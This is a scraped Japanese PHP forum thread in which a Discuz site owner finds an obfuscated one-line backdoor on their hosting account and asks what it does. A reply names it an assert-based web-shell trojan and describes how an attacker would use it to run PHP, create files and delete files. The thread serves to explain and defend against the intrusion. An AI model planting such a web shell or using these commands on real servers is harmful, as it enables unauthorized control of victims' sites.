discuzにこのコードがあります

WBOY
リリース: 2016-06-23 13:32:32
オリジナル
941 人が閲覧しました

@$_/*-/*-*/ ($/*-/ *-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"} */-/*-/*-*/ 2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>

これはどういう意味ですか?
私のウェブサイトがホスティング会社によってブロックされ、よく理解できなかったので、FTP を調べました。
ハッカーによって挿入された可能性があります。


ディスカッションに返信(解決策)


7.phpという見たことのないファイルがあり、その中にこんなコードが入っています

assertを使ってphpを実行するトロイの木馬です機能。

7.php

31c9684ed6846878a666794595400919 次に、shell.html を実行し、
1. textarea に phpinfo(); と入力して送信すると、phpinfo(); の情報が表示されます
2. たとえば、file_put_contents(' と入力します) textarea abc.php','', true); 送信すると、abc.php ファイルがサーバー上に作成されます。
3. unlink('xxxxx'); と入力して、xxx​​ ファイルを削除します。




ところで、これを投稿しましたが、この種の攻撃を防ぐ方法はありますか?


人々はすでにバックドアから離れていますが、それでも予防策を講じることはできますか?
関連ラベル:
ソース:php.cn
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
最新の問題
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート